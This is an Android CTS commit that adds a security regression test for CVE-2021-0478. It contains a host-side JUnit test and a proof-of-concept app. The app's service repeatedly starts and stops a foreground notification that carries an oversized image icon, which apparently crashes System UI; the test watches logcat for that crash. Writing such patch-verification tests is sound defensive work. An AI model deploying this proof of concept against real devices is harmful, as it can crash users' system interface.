CTS test for Android Security b/169255797
Bug: 169255797
Bug: 182917106
Test: Ran the new testcase on android-10.0.0_r39 with/without patch
Change-Id: I275716ca94810e52a37fea429477b41ab8230a23
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java
new file mode 100644
index 0000000..a3b1eae
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java
@@ -0,0 +1,71 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0478 extends SecurityTestCase {
+
+ /**
+ * b/169255797
+ */
+ @AsbSecurityTest(cveBugId = 169255797)
+ @SecurityTest(minPatchLevel = "2021-06")
+ @Test
+ public void testPocCVE_2021_0478() throws Exception {
+ final int SLEEP_INTERVAL_MILLISEC = 30 * 1000;
+ String apkName = "CVE-2021-0478.apk";
+ String appPath = AdbUtils.TMP_PATH + apkName;
+ String packageName = "android.security.cts.cve_2021_0478";
+ String crashPattern = "Canvas: trying to draw too large";
+ ITestDevice device = getDevice();
+
+ try {
+ /* Push the app to /data/local/tmp */
+ pocPusher.appendBitness(false);
+ pocPusher.pushFile(apkName, appPath);
+
+ /* Wake up the screen */
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ /* Install the application */
+ AdbUtils.runCommandLine("pm install " + appPath, device);
+
+ /* Start the application */
+ AdbUtils.runCommandLine("am start -n " + packageName + "/.PocActivity", getDevice());
+ Thread.sleep(SLEEP_INTERVAL_MILLISEC);
+ } catch (Exception e) {
+ e.printStackTrace();
+ } finally {
+ /* Un-install the app after the test */
+ AdbUtils.runCommandLine("pm uninstall " + packageName, device);
+
+ /* Check if System UI has crashed thereby indicating the presence */
+ /* of the vulnerability */
+ String logcat = AdbUtils.runCommandLine("logcat -d *:S AndroidRuntime:E", device);
+ assertNotMatches(crashPattern, logcat);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/Android.bp
new file mode 100644
index 0000000..16094ca
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/Android.bp
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+android_test_helper_app {
+ name: "CVE-2021-0478",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/android/security/cts/CVE_2021_0478/PocActivity.java",
+ "src/android/security/cts/CVE_2021_0478/PocService.java",
+ ],
+ test_suites: [
+ "cts",
+ "vts10",
+ "sts",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/AndroidManifest.xml
new file mode 100644
index 0000000..d8ec56c
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/AndroidManifest.xml
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2021 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.cve_2021_0478"
+ android:versionCode="1"
+ android:versionName="1.0">
+
+ <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
+ <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
+ <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
+ <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
+ <uses-permission android:name="android.permission.WAKE_LOCK" />
+
+ <application
+ android:allowBackup="true"
+ android:label="CVE-2021-0478"
+ android:supportsRtl="true">
+ <service
+ android:name=".PocService"
+ android:enabled="true"
+ android:exported="false" />
+
+ <activity android:name=".PocActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+ </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/layout/activity_main.xml
new file mode 100644
index 0000000..a85bec9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/layout/activity_main.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2021 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<LinearLayout
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:orientation="vertical"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+ <View
+ android:id="@+id/drawableview"
+ android:layout_width="match_parent"
+ android:layout_height="300dp" />
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/raw/image.jpg b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/raw/image.jpg
new file mode 100644
index 0000000..b829548
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/raw/image.jpg
Binary files differ
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocActivity.java
new file mode 100644
index 0000000..65caacf
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocActivity.java
@@ -0,0 +1,72 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.cve_2021_0478;
+
+import android.app.Activity;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.Manifest;
+import android.os.Bundle;
+import android.os.PowerManager;
+import android.os.PowerManager.WakeLock;
+
+public class PocActivity extends Activity {
+ private WakeLock mScreenLock;
+ private Context mContext;
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ try {
+ mContext = this.getApplicationContext();
+ PowerManager pm = mContext.getSystemService(PowerManager.class);
+ mScreenLock = pm.newWakeLock(
+ PowerManager.SCREEN_BRIGHT_WAKE_LOCK | PowerManager.ACQUIRE_CAUSES_WAKEUP,
+ "PocActivity");
+ mScreenLock.acquire();
+ super.onCreate(savedInstanceState);
+ setContentView(R.layout.activity_main);
+ startServices();
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ }
+
+ void startServices() {
+ try {
+ startForegroundService(new Intent(this, PocService.class));
+ requestPermission();
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+
+ void requestPermission() {
+ try {
+ this.requestPermissions(new String[] {Manifest.permission.ACCESS_FINE_LOCATION}, 12);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+
+ @Override
+ protected void onDestroy() {
+ super.onDestroy();
+ mScreenLock.release();
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocService.java
new file mode 100644
index 0000000..dfcedca
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocService.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.cve_2021_0478;
+
+import android.annotation.SuppressLint;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.Service;
+import android.content.Intent;
+import android.graphics.drawable.Icon;
+import android.os.IBinder;
+
+public class PocService extends Service {
+
+ private static long SCAN_DURATION_MILLIS = 60000;
+
+ public PocService() {}
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return null;
+ }
+
+ @Override
+ public void onCreate() {
+ super.onCreate();
+ try {
+ NotificationManager notificationManager =
+ getSystemService(NotificationManager.class);
+ String id = "channel";
+ NotificationChannel notificationChannel =
+ new NotificationChannel(id, " ", NotificationManager.IMPORTANCE_NONE);
+ notificationManager.createNotificationChannel(notificationChannel);
+ @SuppressLint("ResourceType")
+ Notification notification = new Notification.Builder(this, id)
+ .setSmallIcon(Icon.createWithResource(this, R.raw.image))
+ .setContentTitle("hello").build();
+ int notificationID = 31;
+ long startTime = System.currentTimeMillis();
+ long endTime = startTime + SCAN_DURATION_MILLIS;
+ while (System.currentTimeMillis() < endTime) {
+ startForeground(notificationID, notification);
+ stopForeground(true);
+ }
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+}
